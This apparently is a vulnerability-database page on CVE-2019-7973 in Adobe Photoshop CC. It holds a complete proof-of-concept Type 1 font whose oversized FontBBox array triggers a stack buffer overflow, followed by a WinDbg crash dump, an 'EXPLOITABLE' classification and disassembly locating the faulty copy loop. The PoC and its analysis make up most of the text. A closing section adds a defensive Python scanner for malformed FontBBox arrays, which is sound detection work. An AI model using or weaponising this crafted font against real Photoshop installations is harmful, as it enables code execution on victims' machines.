| Title | Published | Views | Reporter |
|---|---|---|---|
| Adobe Photoshop CC 19.x < 19.1.9 / CC 20.x < 20.0.6 Multiple Vulnerabilities (APSB19-44) | 16 Aug 2019 00:00 | – | nessus |
| Adobe Photoshop CC 19.x < 19.1.9 / CC 20.x < 20.0.6 Multiple Vulnerabilities (macOS APSB19-44) | 16 Aug 2019 00:00 | – | nessus |
| Adobe Photoshop CC Type Obfuscation Vulnerability (CNVD-2019-28666) | 15 Aug 2019 00:00 | – | cnvd |
| CVE-2019-7973 | 26 Aug 2019 17:45 | – | cve |
| CVE-2019-7973 | 26 Aug 2019 17:45 | – | cvelist |
| CVE-2019-7973 | 26 Aug 2019 18:15 | – | nvd |
| Adobe Photoshop CC Multiple Vulnerabilities (APSB19-44) - Windows | 14 Aug 2019 00:00 | – | openvas |
| Adobe Photoshop CC Multiple Vulnerabilities (APSB19-44) - Mac OS X | 14 Aug 2019 00:00 | – | openvas |
| CVE-2019-7973 | 26 Aug 2019 18:15 | – | osv |
| Type confusion | 26 Aug 2019 18:15 | – | prion |

%!PS-AdobeFont-1.1: CMMI10 1.100
%%CreationDate: 1996 Jul 23 07:53:57
% Copyright (C) 1997 American Mathematical Society. All Rights Reserved.
11 dict begin
/FontInfo 7 dict dup begin
/version (1.100) readonly def
/Notice (Copyright (C) 1997 American Mathematical Society. All Rights Reserved) readonly def
/FullName (CMMI10) readonly def
/FamilyName (Computer Modern) readonly def
/Weight (Medium) readonly def
/ItalicAngle -14.04 def
/isFixedPitch false def
end readonly def
/FontName /CMMI10 def
/PaintType 0 def
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] readonly def
/Encoding 256 array
0 1 255 {1 index exch /.notdef put} for
dup 11 /alpha put
dup 12 /beta put
dup 13 /gamma put
dup 18 /theta put
dup 21 /lambda put
dup 22 /mu put
dup 25 /pi put
dup 26 /rho put
dup 30 /phi put
dup 58 /period put
dup 59 /comma put
dup 60 /less put
dup 62 /greater put
dup 64 /partialdiff put
dup 65 /A put
dup 67 /C put
dup 68 /D put
dup 70 /F put
dup 73 /I put
dup 77 /M put
dup 85 /U put
dup 86 /V put
dup 100 /d put
dup 101 /e put
dup 102 /f put
dup 103 /g put
dup 110 /n put
dup 112 /p put
dup 117 /u put
dup 118 /v put
dup 120 /x put
dup 121 /y put
dup 122 /z put
readonly def
/FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def
/UniqueID 5087385 def
currentdict end
currentfile eexec
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
cleartomark
/CMMI10 findfont
12 scalefont
setfont
newpath
50 700 moveto
(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%%^&*()_-+=) show
showpage
% Adobe Photoshop CC Type 1 Font FontBBox array Stack Buffer Overflow Remote Code Execution Vulnerability
% Summary:
% ========
% A specially crafted PostScript Type 1 font file can trigger a stack buffer overflow via a crafted FontBBox array.
% Analysis:
% =========
% A large FontBBox array can overflow a stack var and lead to a stack-based buffer overflow. In this example, I supplied a PoC with the following:
% /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def
% Debugging:
% ==========
% STATUS_STACK_BUFFER_OVERRUN encountered
% (133c.850): Break instruction exception - code 80000003 (first chance)
% *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Adobe Photoshop CC 2018 (32 Bit)\MPS.dll -
% eax=00000000 ebx=503aad2c ecx=77a2e4d0 edx=002abf0d esi=00000000 edi=002ac8cc
% eip=77a2e34d esp=002ac154 ebp=002ac1d0 iopl=0 nv up ei pl zr na pe nc
% cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
% kernel32!UnhandledExceptionFilter+0x5f:
% 77a2e34d cc int 3
% 0:000> kv
% # ChildEBP RetAddr Args to Child
% 00 002ac1d0 50126724 503aad2c 002ac50c 5012682f kernel32!UnhandledExceptionFilter+0x5f (FPO: [Non-Fpo])
% WARNING: Stack unwind information not available. Following frames may be wrong.
% 01 002ac1dc 5012682f 503aad2c 00000012 002ac224 MPS!MPSToAGMColorSpace+0x12274
% 02 002ac50c 502556ef 001b2493 45a2b7ec c2000000 MPS!MPSToAGMColorSpace+0x1237f
% 03 002ac594 5012a452 00000001 01002092 459948bc MPS!MPSCT5NewServer+0x7957f
% 04 002ac5e4 5012a6de 002ac720 00000000 002ac8cc MPS!MPSToAGMColorSpace+0x15fa2
% 05 002ac614 5012774a 00000001 00000009 00000000 MPS!MPSToAGMColorSpace+0x1622e
% 06 002ac64c 50352b4a 00000000 00000002 00000000 MPS!MPSToAGMColorSpace+0x1329a
% 07 002ac680 50352855 00000003 00000002 00000002 MPS!MPSCT5NewServer+0x1769da
% 08 002ac694 503532cf 45a0cc24 0000000c 00000000 MPS!MPSCT5NewServer+0x1766e5
% 09 002ac708 503537a2 45a0cc24 00000010 00000010 MPS!MPSCT5NewServer+0x17715f
% 0a 00000000 00000000 00000000 00000000 00000000 MPS!MPSCT5NewServer+0x177632
% 0:000> !load msec
% 0:000> !exploitable
% !exploitable 1.6.0.0
% Exploitability Classification: EXPLOITABLE
% Recommended Bug Title: Exploitable - Stack Buffer Overrun (/GS Exception) starting at MPS!MPSCT5NewServer+0x000000000007957f (Hash=0xe6ea5d40.0x979b8c29)
% An overrun of a protected stack buffer has been detected. This is considered exploitable, and must be fixed.
% Static Analysis:
% ================
% Since the stack var comes from sub_10165500, I'm marking the bug to be in this function.
% .text:10165500 sub_10165500 proc near ; CODE XREF: sub_1012DE70+396
% .text:10165500 ; sub_1012F0D0+1FC
% .text:10165500
% .text:10165500 var_1C = byte ptr -1Ch
% .text:10165500 var_14 = dword ptr -14h
% .text:10165500 var_10 = dword ptr -10h
% .text:10165500 var_C = dword ptr -0Ch
% .text:10165500 var_8 = dword ptr -8
% .text:10165500 var_4 = dword ptr -4
% .text:10165500 arg_0 = dword ptr 8
% .text:10165500 arg_4 = dword ptr 0Ch
% .text:10165500 arg_8 = dword ptr 10h
% .text:10165500
% .text:10165500 push ebp
% .text:10165501 mov ebp, esp
% .text:10165503 sub esp, 1Ch
% .text:10165506 mov eax, ___security_cookie
% .text:1016550B xor eax, ebp
% .text:1016550D mov [ebp+var_4], eax
% .text:10165510 mov ecx, [ebp+arg_8]
% .text:10165513 mov edx, [ebp+arg_0]
% .text:10165516 push ebx
% .text:10165517 push edi
% .text:10165518 mov edi, [ebp+arg_4]
% .text:1016551B test ecx, ecx
% .text:1016551D jnz loc_10165621
% .text:10165523 lea eax, [ebp+var_1C]
% .text:10165526 push eax
% .text:10165527 mov eax, dword_10351CA8
% .text:1016552C add eax, 670h
% .text:10165531 push eax
% .text:10165532 push edx
% .text:10165533 call sub_1021BA70
% .text:10165538 add esp, 0Ch
% .text:1016553B test eax, eax
% .text:1016553D jz loc_101655F9
% .text:10165543 push esi
% .text:10165544 lea eax, [ebp+var_14]
% .text:10165547 push eax
% .text:10165548 lea eax, [ebp+var_1C]
% .text:1016554B push eax ; size 0x10 (4 elements expected)
% .text:1016554C call sub_1010DD40 ; stack overflow
% In sub_1010DD40, we see the following code:
% .text:1010DD80 loc_1010DD80: ; CODE XREF: sub_1010DD40+76
% .text:1010DD80 lea eax, [ebp+var_10]
% .text:1010DD83 push eax
% .text:1010DD84 lea eax, [ebp+var_8]
% .text:1010DD87 push eax
% .text:1010DD88 call sub_10260BD0
% .text:1010DD8D mov eax, [ebp+var_10]
% .text:1010DD90 add esp, 8
% .text:1010DD93 and al, 0F0h
% .text:1010DD95 cmp al, 10h
% .text:1010DD97 jnz short loc_1010DDA3
% .text:1010DD99 movd xmm0, [ebp+var_C]
% .text:1010DD9E cvtdq2ps xmm0, xmm0
% .text:1010DDA1 jmp short loc_1010DDA8
% .text:1010DDA3 ; ---------------------------------------------------------------------------
% .text:1010DDA3
% .text:1010DDA3 loc_1010DDA3: ; CODE XREF: sub_1010DD40+57
% .text:1010DDA3 movss xmm0, [ebp+var_C]
% .text:1010DDA8
% .text:1010DDA8 loc_1010DDA8: ; CODE XREF: sub_1010DD40+61
% .text:1010DDA8 mov eax, [ebp+arg_4]
% .text:1010DDAB inc esi
% .text:1010DDAC movss dword ptr [eax+edi*4], xmm0 ; stack overflow right here
% .text:1010DDB1 movzx edi, si ; edi is the counter
% .text:1010DDB4 cmp edi, ebx ; ebx is the # of elements in the array
% .text:1010DDB6 jb short loc_1010DD80 ; jump back into loop
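
A defensive check based on the analysis above, added here as an example and not part of the original advisory or of any Adobe code: it reads the cleartext header of a Type 1 font and flags a FontBBox whose element count differs from the four numbers the format defines, which is the condition the copy loop in sub_1010DD40 fails to enforce. The function names and the two sample headers are constructed for illustration.

```python
import re
import sys

# The Type 1 format defines FontBBox as exactly four numbers: llx lly urx ury.
EXPECTED = 4
# The array may be written with [] or with {} (as in the font on this page).
BBOX_RE = re.compile(rb"/FontBBox\s*[\[{]([^\]}]*)[\]}]")
NUM_RE = re.compile(rb"^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")


def cleartext(font: bytes) -> bytes:
    """Return the unencrypted header: everything before the eexec operator."""
    idx = font.find(b"eexec")
    return font if idx < 0 else font[:idx]


def check_fontbbox(font: bytes) -> list:
    """Return findings for the header; an empty list means nothing was flagged."""
    matches = list(BBOX_RE.finditer(cleartext(font)))
    if not matches:
        return ["no well-formed /FontBBox in cleartext header"]
    findings = []
    for m in matches:
        tokens = m.group(1).split()
        if len(tokens) != EXPECTED:
            findings.append(f"FontBBox has {len(tokens)} elements, expected {EXPECTED}")
        bad = [t for t in tokens if not NUM_RE.match(t)]
        if bad:
            findings.append(f"FontBBox has {len(bad)} non-numeric token(s)")
    return findings


# Constructed sample headers (not real font files). OVERSIZED has the same
# shape as the array quoted in the advisory: four values plus extra elements.
BENIGN = b"/FontName /CMMI10 def\n/FontBBox{-32 -250 1048 750}readonly def\ncurrentfile eexec\n"
OVERSIZED = (b"/FontBBox{-32 -250 1048 750 " + b" ".join([b"1337"] * 21)
             + b"}readonly def\ncurrentfile eexec\n")

if __name__ == "__main__":
    # Scan any font files given on the command line and report findings.
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for finding in check_fontbbox(fh.read()):
                print(f"{path}: {finding}")
```

A parser that consumes this field is safe only if it also caps the number of elements it copies at the size of the destination buffer; a scanner like this one is a triage aid for incoming files, not a substitute for the vendor fix.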